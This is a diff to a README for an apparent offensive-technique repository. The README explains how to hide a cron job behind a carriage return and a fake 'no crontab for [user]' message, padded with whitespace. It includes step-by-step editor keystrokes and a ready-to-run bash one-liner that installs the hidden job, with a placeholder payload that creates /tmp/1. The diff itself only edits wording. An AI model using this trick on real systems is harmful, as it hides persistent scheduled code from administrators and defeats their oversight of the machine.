0xceba/hide_crontab_carriage_return/README.md

 1. Insert the carriage return:
 	* nano: `Alt`+`V` then `Ctrl`+`M`.
 	* vi/vim: `Ctrl`+`V` then `Ctrl`+`M`.
-1. Write the display message that says there are is crontab: `no crontab for [user]`.
+1. Write the display message that says there is no crontab: `no crontab for [user]`.
-1. Add sufficient whitespaces after the message to completely hide the cron job.
-The minimum number of whitespaces is: length of cron job - 14 - length of user name.
+1. Add sufficient whitespace after the message to completely hide the cron job.
+The minimum number of whitespace is: length of cron job - 14 - length of username.

-The crontab file will contain the following when finished:
+The crontab file will look like the following when finished:
 ```
 * * * * * touch /tmp/1;^Mno crontab for root
 ```

-**Execute with bash one-liner:**
+**Bash one-liner execution:**
+Or use the following one-liner:
 ```
 cc="* * * * * touch /tmp/1" ; ct=$(printf "$cc;\rno crontab for $USER%*s" $(expr length "$cc" - 14 - $(expr length $USER))) ; echo "$ct" | crontab -
 ```